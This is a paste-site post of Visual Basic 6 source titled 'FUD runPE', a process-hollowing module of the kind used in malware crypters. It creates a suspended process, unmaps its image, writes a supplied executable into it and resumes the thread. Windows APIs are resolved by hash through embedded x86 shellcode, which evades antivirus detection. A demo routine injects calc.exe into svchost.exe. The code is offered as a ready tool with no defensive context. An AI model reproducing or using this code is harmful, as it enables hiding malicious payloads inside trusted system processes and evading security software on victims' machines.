2014 FUD runPE by cheguevara

SUBMITTED BY: Guest

DATE: Feb. 23, 2014, 10:43 p.m.

FORMAT: Text only

SIZE: 6.5 kB

Raw Download

HITS: 1071

Report
  1. Attribute VB_Name = "Module1"
  2. Option Explicit
  3. Option Base 0
  5. Private Type DWORD_L
  6. D1 As Long
  7. End Type
  9. Private Type DWORD_B
  10. B1 As Byte: B2 As Byte
  11. B3 As Byte: B4 As Byte
  12. End Type
  14. 'USER32
  15. Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
  17. Private bInitialized_Inv As Boolean
  18. Private ASM_gAPIPTR(170) As Byte
  19. Private ASM_cCODE(255) As Byte
  21. Private Const KERNEL32 As String = "KERNEL32"
  22. Private Const NTDLL As String = "NTDLL"
  24. 'RunPE
  25. Public Function Populate(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Boolean
  26. Dim hModuleBase As Long
  27. Dim hPE As Long
  28. Dim hSec As Long
  29. Dim ImageBase As Long
  30. Dim i As Long
  31. Dim tSTARTUPINFO(16) As Long
  32. Dim tPROCESS_INFORMATION(3) As Long
  33. Dim tCONTEXT(50) As Long
  35. hModuleBase = VarPtr(bvBuff(0))
  37. If Not GetNumb(hModuleBase, 2) = &H5A4D Then Exit Function
  39. hPE = hModuleBase + GetNumb(hModuleBase + &H3C)
  41. If Not GetNumb(hPE) = &H4550 Then Exit Function
  43. ImageBase = GetNumb(hPE + &H34)
  45. tSTARTUPINFO(0) = &H44
  46. 'CreateProcessW@KERNEL32
  47. Call Invoke(KERNEL32, &H16B3FE88, StrPtr(sHost), StrPtr(sParams), 0, 0, 0, &H4, 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))
  48. 'NtUnmapViewOfSection@NTDLL
  49. Call Invoke(NTDLL, &HF21037D0, tPROCESS_INFORMATION(0), ImageBase)
  50. 'NtAllocateVirtualMemory@NTDLL
  51. Call Invoke(NTDLL, &HD33BCABD, tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + &H50)), &H3000, &H40)
  52. 'NtWriteVirtualMemory@NTDLL
  53. Call Invoke(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + &H54), 0)
  55. For i = 0 To GetNumb(hPE + &H6, 2) - 1
  56. hSec = hPE + &HF8 + (&H28 * i)
  58. 'NtWriteVirtualMemory@NTDLL
  59. Call Invoke(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + &HC), hModuleBase + GetNumb(hSec + &H14), GetNumb(hSec + &H10), 0)
  60. Next i
  62. tCONTEXT(0) = &H10007
  63. 'NtGetContextThread@NTDLL
  64. Call Invoke(NTDLL, &HE935E393, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
  65. 'NtWriteVirtualMemory@NTDLL
  66. Call Invoke(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), tCONTEXT(41) + &H8, VarPtr(ImageBase), &H4, 0)
  68. tCONTEXT(44) = ImageBase + GetNumb(hPE + &H28)
  70. 'NtSetContextThread@NTDLL
  71. Call Invoke(NTDLL, &H6935E395, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
  72. 'NtResumeThread@NTDLL
  73. Call Invoke(NTDLL, &HC54A46C8, tPROCESS_INFORMATION(1), 0)
  75. hProcess = tPROCESS_INFORMATION(0)
  76. Populate = True
  77. End Function
  79. Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
  80. 'NtWriteVirtualMemory@NTDLL
  81. Call Invoke(NTDLL, &HC5108CC2, -1, VarPtr(GetNumb), lPtr, lSize, 0)
  82. End Function
  84. Public Function Invoke(ByVal sDLL As String, ByVal hHash As Long, ParamArray vParams() As Variant) As Long
  85. Dim vItem As Variant
  86. Dim bsTmp As DWORD_B
  87. Dim lAPI As Long
  88. Dim i As Long
  89. Dim w As Long
  91. If Not bInitialized_Inv Then
  92. For i = 0 To 170
  93. ASM_gAPIPTR(i) = CByte(Choose(i + 1, &HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
  94. &H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3))
  95. Next i
  96. i = 0
  97. bInitialized_Inv = True
  98. End If
  100. lAPI = CallWindowProcW(VarPtr(ASM_gAPIPTR(0)), StrPtr(sDLL), hHash)
  102. If lAPI Then
  103. For w = UBound(vParams) To LBound(vParams) Step -1
  104. bsTmp = SliceLong(CLng(vParams(w)))
  105. '// PUSH ADDR
  106. Call PutByte(&H68, i)
  107. Call PutByte(bsTmp.B1, i): Call PutByte(bsTmp.B2, i)
  108. Call PutByte(bsTmp.B3, i): Call PutByte(bsTmp.B4, i)
  109. Next w
  111. bsTmp = SliceLong(lAPI)
  112. '// MOV EAX, ADDR
  113. Call PutByte(&HB8, i)
  114. Call PutByte(bsTmp.B1, i): Call PutByte(bsTmp.B2, i)
  115. Call PutByte(bsTmp.B3, i): Call PutByte(bsTmp.B4, i)
  116. '// CALL EAX
  117. Call PutByte(&HFF, i): Call PutByte(&HD0, i)
  118. '// RET
  119. Call PutByte(&HC3, i)
  121. Invoke = CallWindowProcW(VarPtr(ASM_cCODE(0)))
  122. End If
  123. End Function
  125. Private Sub PutByte(ByVal bByte As Byte, ByRef iCounter As Long)
  126. ASM_cCODE(iCounter) = bByte
  127. iCounter = iCounter + 1
  128. End Sub
  130. Private Function SliceLong(ByVal lLong As Long) As DWORD_B
  131. Dim tL As DWORD_L
  133. tL.D1 = lLong
  134. LSet SliceLong = tL
  135. End Function
  137. Private Sub Main()
  138. Dim x() As Byte
  139. Open Environ$("WINDIR") & "\SYSTEM32\calc.exe" For Binary As #1
  140. ReDim x(0 To LOF(1) - 1)
  141. Get #1, , x
  142. Close #1
  143. Call Populate(x, Environ$("WINDIR") & "\SYSTEM32\svchost.exe")
  144. End Sub
comments powered by Disqus